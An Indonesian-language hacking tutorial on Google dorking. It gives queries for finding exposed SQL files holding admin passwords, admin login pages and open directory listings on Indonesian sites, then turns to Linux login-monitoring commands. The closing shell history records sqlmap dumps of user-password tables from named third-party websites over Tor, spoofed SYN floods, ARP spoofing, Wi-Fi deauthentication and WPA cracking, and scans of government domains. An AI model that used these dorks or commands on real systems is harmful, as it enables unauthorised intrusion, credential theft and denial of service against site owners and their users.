Google banyak sekali di gunakan untuk mencari file yang kita inginkan , misal kita ingin mendownload file untuk soal soal test ujian ,yang kita lakukan adalah menuliskan perintah “Download soal-soal latihan ujian tehnik elektro” dan enter , google akan menampilkan website-website atau link-link yang di dalamnya terdapat tulisan download , soal-soal , latihan , ujian , tehnik , elektro , dan semua terpisah pisah seperti gambar berikut
 
 
 
jika halaman dari google yang keluar sangat membingungkan kita , ternyata di google ada perintah-perintah yang dapat memudahkan kita untuk mendapatkan file yang kita inginkan berdasarkan extensi dari file tersebut perintah itu adalah “filetype” cara menggunakanya ketikan seperti ini “filetype:pdf” dan enter
 
 
 
lihat yang tampil di google ketika kita ketikan “filetype:pdf download soal-soal ujian” semua yang akan tampil adalah documen dengan judul atau kata awal “DOWNLOAD SOAL UJIAN” google mencari berdasarkan extensi dari file yang akan di download , dan ini sangat banyak fariasinya ketika di gunakan untuk menggali informasi sebuah website ataupu data , coba saja merubahnya dengan keyword berikut “filetype:sql “password” “user” “admin” ” , dan masih banyak falian lainya menggunakan ini contoh lagi kalian akan menampilkan file MDB dengan perintah “filetype:db configure , admin , administrator”
 
 
 
jika kalian menginginkan sebuah software yang sangat susah untuk di temukan gunakan perintah “filetype” untuk mencarinya , contohnya saya akan mencari software zenmap dengan perintah berikut “filetype:rar zenmap.rar”
 
 
 
MENCARI INFORMASI TITLE
 
Setelah membahas tentang mencari file dengan google key , kali ini akan mencari berdasarkan title pada halaman website , yang di makasut title ketika kalian mengunjungi situs pasti di halaman terdapat title halaman tersebut misal halaman login administartor tang memiliki title login admin atau administrator login , mengapa seperti ini bukanya ini juga resiko ? Yaps memang benar kalua di lihat dari segi keamanan kurang mendukung jika seseorang mendapatkan password admin dan usernya maka sangat mudah untuk di cari halaman loginya , dan kenapa para devloper menggunanakan title ini , mungkin bagi mereka itu supa memudahkan para admin mencari halaman loginya
 
Dan tehnik mencari berdasarkan title dari sebuah website dengan menggunakan google juga tidak terlalu susah mirip dengan perintah-perintah google yang ada di atas , akan tetapi berbeda keyword yang di gunakanya dalam contoh kali ini kalian akan mencoba mencari situs-situs yang memiliki title “login administrator” yang menunjukan halaman login dari administrator
 
Perintah yang di gunakan ada 2 sama dengan yang di atas “intitle:” dan juga “allintitle:” perbedaan dari keduanya tidak terlalu jauh , jika intitle yang di gunakan seperti ini “intitle:login administrator” maka yang keluar ada kalanya bertitle login , dan berisikan text admin di bawahnya contoh pada gambar berikut mencari halaman login dengan title , buka google dan tulis “intitle:login administrator”
 
 
 
dan coba buka salah satu dari beberapa situs yang di tampilkan oleh google dan lihat apakah benar situs tersebut memiliki halaman login dengan title yang kalian masukan ke dalam google tersebut
 
 
 
sedangkan jika kalian menggunakan allintitle maka google akan menampilkan dengan title yang kalian inputkan ke google , contohnya “allintitle:administrator login” maka title yang akan keluar adalah administrator login
 
 
 
kalian bisa membuka dari hasil yang di tampilkan oleh google , pilih salah satu halaman website yang tersedia di google dan lihat halaman apa yang kalian temukan
 
 
[Mencari berdasarkan site]
 
Hmmmmmm jika kalian sudah paham atau tahu tentang mencari file dan mencari berdasaran url , mencari berdasarkan title , kali ini kalian akan mencari berdasarkan site domain, ada banyak sekali domain-domain negara yang berbeda-beda ini ektensi dari domain yang ada
 
.ac Ascension Island
.ad Andorra
.ae United Arab Emirates
.af Afghanistan
.ag Antigua and Barbuda
.ai Anguilla
.al Albania
.am Armenia
.an Netherlands Antilles
.ao Angola
.aq Antarctica
.ar Argentina
.as American Samoa
.at Austria
.au Australia
.aw Aruba
.ax Åland
.az Azerbaijan
.ba Bosnia and Herzegovina
.bb Barbados
.bd Bangladesh
.be Belgium
.bf Burkina Faso
.bg Bulgaria
.bh Bahrain
.bi Burundi
.bj Benin
.bm Bermuda
.bn Brunei Darussalam
.bo Bolivia
.br Brazil
.bs Bahamas
.bt Bhutan
.bv Bouvet Island
.bw Botswana
.by Belarus
.bz Belize
.ca Canada
.cc Cocos (Keeling) Islands
.cd Democratic Republic of the Congo tadinya Zaire
.cf Central African Republic
.cg Republic of the Congo
.ch Switzerland
.ci Côte d’Ivoire
.ck Cook Islands
.cl Chile
.cm Cameroon
.cn hanya untuk China Daratan: Hong Kong dan Macau menggunakan TLD berbeda.
.co Colombia
.cr Costa Rica
.cu Cuba
.cv Cape Verde
.cx Christmas Island
.cy Cyprus
.cz Czech Republic
.de Germany (Deutschland)
.dj Djibouti
.dk Denmark
.dm Dominica
.do Dominican Republic
.dz Algeria (Dzayer)
.ec Ecuador
.ee Estonia
.eg Egypt
.er Eritrea
.es Spain (España)
.et Ethiopia
.eu European Union
.fi Finland
.fj Fiji
.fk Falkland Islands
.fm Federated States of Micronesia
.fo Faroe Islands
.fr France
.ga Gabon
.gb United Kingdom jarang digunakan; primary ccTLD yang sering digunakan ialah .uk untuk United Kingdom
.gd Grenada
.ge Georgia
.gf French Guiana
.gg Guernsey
.gh Ghana
.gi Gibraltar
.gl Greenland
.gm The Gambia
.gn Guinea
.gp Guadeloupe
.gq Equatorial Guinea
.gr Greece
.gs South Georgia and the South Sandwich Islands
.gt Guatemala
.gu Guam
.gw Guinea-Bissau
.gy Guyana
.hk Hong Kong Special administrative region dari People’s Republic of China.
.hm Heard Island and McDonald Islands
.hn Honduras
.hr Croatia (Hrvatska)
.ht Haiti
.hu Hungary
.id Indonesia
.ie Ireland (Éire)
.il Israel
.im Isle of Man
.in India
.io British Indian Ocean Territory
.iq Iraq
.ir Iran
.is Iceland (Ísland)
.it Italy
.je Jersey
.jm Jamaica
.jo Jordan
.jp Japan
.ke Kenya
.kg Kyrgyzstan
.kh Cambodia (Khmer)
.ki Kiribati
.km Comoros
.kn Saint Kitts and Nevis
.kp North Korea
.kr South Korea
.kw Kuwait
.ky Cayman Islands
.kz Kazakhstan
.la Laos kini dipasarkan sebagai domain official untuk Los Angeles.
.lb Lebanon
.lc Saint Lucia
.li Liechtenstein
.lk Sri Lanka
.lr Liberia
.ls Lesotho
.lt Lithuania
.lu Luxembourg
.lv Latvia
.ly Libya
.ma Morocco
.mc Monaco
.md Moldova
.me Montenegro
.mg Madagascar
.mh Marshall Islands
.mk Republic of Macedonia
.ml Mali
.mm Myanmar
.mn Mongolia
.mo Macau Special administrative region dari People’s Republic of China.
.mp Northern Mariana Islands
.mq Martinique
.mr Mauritania
.ms Montserrat
.mt Malta
.mu Mauritius
.mv Maldives
.mw Malawi
.mx Mexico
.my Malaysia
.mz Mozambique
.na Namibia
.nc New Caledonia
.ne Niger
.nf Norfolk Island
.ng Nigeria
.ni Nicaragua
.nl Netherlands
.no Norway
.np Nepal
.nr Nauru
.nu Niue Biasa digunakan untuk website-website Scandinavian dan Dutch, karena dalam bahasa mereka ‘nu’ berarti ‘now’.
.nz New Zealand
.om Oman
.pa Panama
.pe Peru
.pf French Polynesia dengan Clipperton Island
.pg Papua New Guinea
.ph Philippines
.pk Pakistan
.pl Poland
.pm Saint-Pierre and Miquelon
.pn Pitcairn Islands
.pr Puerto Rico
.ps Palestinian territories di bawah kontrol PA yang meliputi Tepi Barat (West Bank) dan Jalur Gaza (Gaza Strip)
.pt Portugal
.pw Palau
.py Paraguay
.qa Qatar
.re Réunion
.ro Romania
.rs Serbia
.ru Russia
.rw Rwanda
.sa Saudi Arabia
.sb Solomon Islands
.sc Seychelles
.sd Sudan
.se Sweden
.sg Singapore
.sh Saint Helena
.si Slovenia
.sj Svalbard dan Jan Mayen
.sk Slovakia
.sl Sierra Leone
.sm San Marino
.sn Senegal
.so Somalia
.sr Suriname
.st São Tomé and Príncipe
.su tadinya Soviet Union
.sv El Salvador
.sy Syria
.sz Swaziland
.tc Turks and Caicos Islands
.td Chad
.tf French Southern and Antarctic Lands
.tg Togo
.th Thailand
.tj Tajikistan
.tk Tokelau
.tl East Timor
.tm Turkmenistan
.tn Tunisia
.to Tonga
.tp East Timor
.tr Turkey
.tt Trinidad and Tobago
.tv Tuvalu nama domain yang banyak digunakan oleh stasiun televisi.
.tw Taiwan, Republic of China
.tz Tanzania
.ua Ukraine
.ug Uganda
.uk United Kingdom
.um United States Minor Outlying Islands
.us United States of America Biasa digunakan oleh U.S. State dan local governments daripada TLD .gov
.uy Uruguay
.uz Uzbekistan
.va Vatican City State
.vc Saint Vincent and the Grenadines
.ve Venezuela
.vg British Virgin Islands
.vi U.S. Virgin Islands
.vn Vietnam
.vu Vanuatu
.wf Wallis and Futuna
.ws Samoa tadinya Western Samoa
.ye Yemen
.yt Mayotte
.yu Yugoslavia Kini digunakan untuk Serbia dan Montenegro
.za South Africa (Zuid-Afrika)
.zm Zambia
.zw Zimbabwe
 
Cara menggunakanya juga tidak rumit , jika kalian ingin mencari situs-situs negara yamen kalian tinggal inputkan perintah “site:” di google contohnya inputkan ke google “site:.ye” dan enter , lihat semua yang tampil adalah domain-domain yamen
 
 
 
 
hmmmm menarik bukan ,kalian bisa mencari domain mana saja dengan menggunakan tehnik site , semua negara terdaftar di index google , google adalah intelijen yang bersih dan benar-benar tidak terlihat !!!
 
[kombinasi penggalina informasi]
 
Di sini kita akan mencoba menggali informasi dengan kombinasi perintah-perintah dari google yang menyebabkan kita dapat menggali informasi dari sebuah website , informasi email , informasi file-file sensitive , user password sql server , mencari data-data yang penting dan tidak di hiraukan terutama di indonesia ini.
 
Oke kita mukai saja dari yang pertama kita akan mencari site “id” atau indonesia , dan menggali file-file sql yang dapat di tampilkan di web-browser kita , kita gunakan saja perintah kombinasi antara filetype dan site contohnya seperti ini , masukan ke google perintah “filetype:sql admin password site:id” tanpa tanda kutip pastinya
 
 
 
Hemmm banyak bukan situs-situs indonesia yang mudah di gali informasinya , menggunakan google dengan waktu yang singkat kalian sudah dapat mendapatkan password dan user sql sebuah website
 
 
 
Dan yang kedua kita coba mencari file file yang sensitive dalam arti , kita dapat memanfaatkan file tersebut untuk menembus sebuah system , contohnya ketika kalian mendapatkan file upload , dan ternyata fileupload dapat di racuni dengan tamper data atau yang lainya , atau kita dapat menemukan file index-index admin yang ada
 
Oke berikan kebada google perintah “intitle /index of admin | index of /filemanager” dan lansung saja eksekusi google dan lihat apa yang di tampilkan oleh google banyak sekali file yang bisa di gali dan dapat di gunakan sebagai taham enumerasi atau penggalian informasi , buka salah satu website yang di tampilkan oleh google tersebut dan lihat
 
 
 
Fiuuuuuhhh bukan maen kan , kita dapat melihat directory dan file file yang ada di dalam sebuah server tersebut , walaupun kita tidak dapat melihat seutuhnya tapi kita dapat memetakan directory yang ada di dalam server tersebut dan mencari-cari file yang tidak seharusnya kita dapatkan
 
 
 
 
biar lebih jelas tidak di sensor hanya buat pembelajaran saja oke dan kalian bebas menggunakan keyword google yang ada , tapi ingat ini hanya server yang bisa di inject dengan cara begini saja orang kecilpun bisa melakukan nya jadi jangan bangaa oke ! Ada beberapa combinasi yang adapat menyebabkan serangan ini menjadi lebih menarik yang dapat menjadi kesalahan yang amat fatal :)
 
reverensi nya http://www.exploit-db.com/ google tergantung yang menggunakan nya bukan tergantung pada pendidikan nya :D ada beberapa vuln yang sering di gunakan para hacker untuk mencari website secara masal dengan vulnerability yang ada , yaitu sebagai berikut
    vulnerability server
    Data sensitive
    Password access
    download database sql & mdb
 
masih banyak sekali yang di miliki oleh google untuk melakukan penggalian informasi selanjut nya akan di bahas di BAB Social Angineering ( SOCENG )

Melihat kegiatan di server ,laptop , atau PC


Di dalam linux ada beberapa perintah di console yang memeprmudah kita untuk mencari tau informasi tentang login sistem atau yang melakukan login ke dalam sistem kita contohnya kita ingin melihat siapakah yang terakhir kali login ke server dengan perintah “last” buka terminal kalian dan ketikan “last



hmm dapat di lihat bukan IP terakhir kali yang memasuki server kita dan ini semakin mudah untuk mengidentifikasikan pelaku jika ada penyusup yang mencoba memasuki server kalian

Multiuser di linux sering di gunakan untuk cloud server dan banyak yang login untuk mengakses data yang berada di dalam server tersebut, bagaimana caranya untuk melihat user siapa saja yang aktif di dalam server tersebut ??? Cukup membuka terminal atau console dan ketikan “w” atau “who

18:42:38 up 7 days, 6:08, 2 users, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
root pts/0 114.79.18.151 18:30 10:16 0.02s 0.02s -bash
root pts/1 114.79.17.25 18:42 0.00s 0.05s 0.03s w

Disitu kalian bisa melihat user mana saja yang aktif di dalam server kalian, karena penulis menggunakan server pribadi yang terlihat hanya IP dari satu jaringan saja,

root pts/0 2014-07-07 18:30 (114.79.18.151)
root pts/1 2014-07-07 18:42 (114.79.17.25)

Atau dengan perintah “ps aux | grep bash | grep pts

root 20030 0.0 0.0 108344 1816 pts/0 Ss+ 18:30 0:00 -bash
root 20132 0.0 0.0 108344 1820 pts/1 Ss 18:42 0:00 -bash
root 20161 0.0 0.0 103252 804 pts/1 S+ 18:46 0:00 grep bash

Dan kalian bisa melihat aktifitas terahir di dalam server kalian dengan perintah “lastlog” yang kalian inputkan di terminal

Username Port From Latest
root pts/1 114.79.17.25 Mon Jul 7 18:42:33 +0700 2014
bin **Never logged in**
daemon **Never logged in**
adm **Never logged in**
lp **Never logged in**
sync **Never logged in**
shutdown **Never logged in**
halt **Never logged in**
mail **Never logged in**
uucp **Never logged in**
operator **Never logged in**
games **Never logged in**
gopher **Never logged in**
ftp **Never logged in**
nobody **Never logged in**
dbus **Never logged in**
vcsa **Never logged in**
rpc **Never logged in**
abrt **Never logged in**
haldaemon **Never logged in**
ntp **Never logged in**
saslauth **Never logged in**
postfix **Never logged in**
rpcuser **Never logged in**
nfsnobody **Never logged in**
sshd **Never logged in**
tcpdump **Never logged in**
oprofile **Never logged in**
mysql **Never logged in**
apache **Never logged in**
dovecot **Never logged in**
dovenull **Never logged in**
cyrus **Never logged in**

Dan juga bisa menggunakan tools bantu seperti “finger” akan tetapi perlu di isntall terlebih dahulu, jika menggunakan linux centos kalian bisa mendownload “yum finger” dan debian dan ubuntu “apt-get install finger” menggunakanya cukup mudah hanya ketikan di terminal “finger

Login Name Tty Idle Login Time Office Office Phone
root root pts/0 24 Jul 7 18:30 (114.79.18.151)
root root pts/1 Jul 7 18:42 (114.79.17.25)

Ada lagi jika kalian ingin melihat kegiatan apa saja yang telah di lakuakan di server klaian, kalian bisa melihat dengan perintah “historyperintah tersebut akan menampilkan semua kegiatan yang telah di lakukan server kalian lihat hasil inputnya

1823 sqlmap --random-agent -u http://www.downhilldragonclan.com/products.php?id=42 --dbs --tor-port=9050
1824 sqlmap --random-agent -u http://www.downhilldragonclan.com/products.php?id=42 -D munkae --tables --tor-port=9050
1825 sqlmap --random-agent -u http://www.downhilldragonclan.com/products.php?id=42 -D munkae -T pageData --colomns --tor-port=9050
1826 sqlmap --random-agent -u http://www.downhilldragonclan.com/products.php?id=42 -D munkae -T pageData --columns --tor-port=9050
1827 sqlmap --random-agent -u http://www.downhilldragonclan.com/products.php?id=42 -D munkae -T pageData --rider --tor-port=9050
1828 sqlmap --random-agent -u http://www.downhilldragonclan.com/products.php?id=42 -D munkae -T rider --columns --tor-port=9050
1829 cd /media/DATA_/icdi/
1830 ls
1831 cd Backup-database/
1832 ls
1833 cd Backup/
1834 ls
1835 cd ..
1836 ls
1837 ls -al
1838 cd
1839 clea r
1840 clear
1841 hping3 --help
1842 arpspoof --help
1843 arpspoof -i wlan0 -t 10.10.10.1 -r 10.10.10.0/24
1844 arpspoof -i wlan0 -t 10.10.10.1 -r 10.10.10.100
1845 virtualbox
1846 wireshark
1847 hping3 --help
1848 hping3 -i u1 -S -p 80 -c 100000 10.10.10.3
1849 hping3 -i wlan0 -S -p 80 -c 100000 10.10.10.3
1850 hping3 -S 10.10.10.1 -p 80 -a 10.10.10.3 -s 80 -- flood –k
1851 hping3 -S 10.10.10.1 -p 80 -a 10.10.10.3 -s 80 -- flood --k
1852 hping3 -S 10.10.10.1 -p 80 -a 10.10.10.3 -s 80 -- flood -k
1853 hping3 -S 10.10.10.1 -p 80 -a 10.10.10.3 -s 80 -- flood
1854 hping3 -S -p 80 -a 10.10.10.3 -s 80 -- flood -k
1855 hping3 --helpm
1856 hping3 --help
1857 hping3 -i u1 -S -p 80 -c 10 192.168.1.1
1858 hping3 -i u1 -S -p 80 -c 10 10.10.10.1
1859 hping3 -i wlan0 -S -p 80 -c 10 10.10.10.1
1860 hping3 -i wlan0 -S -p * -c 10 10.10.10.1
1861 hping3 -i wlan0 -S -p 123 -c 10 10.10.10.1
1862 hping3 --help
1863 hping3 -S 192.168.1.4 -p 80 -a 192.168.1.4 -s 80 -- flood -k
1864 hping3 -S 10.10.10.1 -p 80 -a 10.10.10.1 -s 80 -- flood -k
1865 hping3 -S 10.10.10.1 -p 80 -a 10.10.10.3 -s 80 -- flood -k
1866 hping3 -S -p 80 -a 10.10.10.1 -s 80 -- flood -k
1867 hping3 -S -p 80 -a 10.10.10.1 -s 80 -- flood -k
1868 hping3 -s -p 80 -a 10.10.10.1 -s 80 -- flood -k
1869 hping3 -I wlan0 -c 1000000 --faster -S 10.10.10.1
1870 wireshark
1871 service postgresql start
1872 service metasploit start
1873 msfconsole
1874 virtualbox
1875 ping yogya.siap-ppdb.com
1876 nmap -sS -O -sV 118.97.100.130
1877 uniscan -u http://yogya.siap-ppdb.com/ -qw
1878 cd /media/hiburan/film/Die\ Hard\ 4/
1879 ls
1880 unrar -e live-free-or-die-hard-die-hard-40_indonesian-455709.rar
1881 ls
1882 unrar e live-free-or-die-hard-die-hard-40_indonesian-455709.rar
1883 ls
1884 cd
1885 clear
1886 /etc/init.d/tor start
1887 msfweb
1888 setoolkit
1889 service postgresql start
1890 service metasploit start
1891 clear
1892 msfconsole
1893 clear
1894 apt-get install veil
1895 clear
1896 ls -al
1897 nano catatan.txt
1898 setoolkit
1899 cd
1900 clear
1901 theharvester -d kasperskyindonesiapartner.com -l 1000 -b google
1902 apt-get install cryptkeeper
1903 nasm
1904 nasm -h
1905 cd /media/DATA_/N-gative/coding/assambly
1906 ls
1907 cd
1908 clear
1909 cd /media/DATA_/N-gative/coding/assambly/
1910 ls
1911 cp asm-10-evil.txt /tmp/
1912 cd
1913 cd /tmp/
1914 ls
1915 mv asm-10-evil.txt asm-10-evil.asm
1916 ls
1917 nasm -f elf asm-10-evil.asm
1918 nano asm-10-evil.asm
1919 geany asm-10-evil.asm
1920 ld test.o -o test
1921 ld asm-10-evil.o -o asm-10-evil
1922 ls
1923 gcc asm-10-evil.o -o asm-10-evil
1924 ls
1925 cd
1926 killall -9 iceweasel
1927 top
1928 cd /tmp
1929 ls
1930 nano asm-10-evil.asm
1931 nasm -f elf asm-10-evil.asm
1932 geany asm-10-evil.asm
1933 apt-get install masm
1934 geany asm-10-evil.asm
1935 cd
1936 celar
1937 clear
1938 virtualbox
1939 sqlmap --help
1940 /etc/init.d/tor start
1941 clear
1942 sqlmap --random-agent -u http://www.karnaticlabrecords.com/cart.php?id=88 --dbs --tor-port=9050
1943 sqlmap --random-agent -u http://www.coastal-koi.com/view_product.php?id=1393 --dbs --tor-port=9050
1944 sqlmap --random-agent -u http://www.coastal-koi.com/view_product.php?id=1393 -D coastal --tables --tor-port=9050
1945 sqlmap --random-agent -u http://www.coastal-koi.com/view_product.php?id=1393 --dbs --tor-port=9050
1946 sqlmap --random-agent -u http://www.coastal-koi.com/view_product.php?id=1393 -D ibass --tables --tor-port=9050
1947 sqlmap --random-agent -u http://www.coastal-koi.com/view_product.php?id=1393 --dbs --tor-port=9050
1948 sqlmap --random-agent -u http://www.coastal-koi.com/view_product.php?id=1393 -D isword --tables --tor-port=9050
1949 sqlmap --random-agent -u http://www.coastal-koi.com/view_product.php?id=1393 -D mysql --tables --tor-port=9050
1950 sqlmap --random-agent -u http://www.papercraft4u.co.uk/index.php?id=22 --dbs --tor-port=9050
1951 sqlmap --random-agent -u http://www.papercraft4u.co.uk/index.php?id=22 -D papercraft --tables --tor-port=9050
1952 sqlmap --random-agent -u http://www.papercraft4u.co.uk/index.php?id=22 -D papercraft -T cms_users --tor-port=9050
1953 sqlmap --random-agent -u http://www.papercraft4u.co.uk/index.php?id=22 -D papercraft -T cms_users --columns --tor-port=9050
1954 sqlmap --random-agent -u http://www.papercraft4u.co.uk/index.php?id=22 -D papercraft -T cms_users -C cms_user_passwd -dump --tor-port=9050
1955 sqlmap --random-agent -u http://www.papercraft4u.co.uk/index.php?id=22 -D papercraft -T cms_users -C cms_user_passwd --dump --tor-port=9050
1956 ping 202.152.26.149
1957 nmap -Pn -sS -O -sV 202.152.26.149
1958 nmap -Pn -sS -O -sV 202.152.26.144-202.152.26.159
1959 nmap -Pn -sS -O -sV 202.152.26.144 202.152.26.159
1960 clear
1961 nmap -Pn -sS -O -sV 202.152.26.144 202.152.26.159
1962 sqlmap --help
1963 clear
1964 nmap
1965 theharvester -d artajasa.co.id -l 1000 -b google
1966 maltego
1967 top
1968 ping www.kpu-pesisirselatankab.go.id
1969 nmap -sS -O -sV www.kpu-pesisirselatankab.go.id
1970 /etc/init.d/tor start
1971 clear
1972 uniscan -u http://www.kpu-pesisirselatankab.go.id/ -qw
1973 ifconfig
1974 clear
1975 ifconfig wlan0 down
1976 ifconfig
1977 airmon-ng start wlan0
1978 ifconfig
1979 clear
1980 airodump-ng mon0
1981 airodump-ng mon0 --channel 6 --bssid 64:70:02:7D:E0:6E -w /tmp/crack_save
1982 aireplay-ng -0 1 -a 64:70:02:7D:E0:6E -c 00:08:22:E6:B9:FB mon0
1983 clear
1984 ohn --stdout --incremental:all | aircrack-ng -b 64:70:02:7D:E0:6E -w - /tmp/crack_save-01.cap
1985 ifconfig wlan0 up
1986 clear
1987 lynis --help
1988 locate lynis
1989 nano /var/log/lynis.log
1990 locate lynis
1991 lynis --help
1992 lynis -c
1993 /etc/init.d/tor start
1994 clear
1995 netstat
1996 netstat | grep tcp
1997 clear
1998 man netstat
1999 netstats
2000 netstat
2001 history

Banyak sekali bukan yang telah di lakukan di server atau laptop dan PC kalian :) semoga bermanfaat dan membantu untuk belajar :)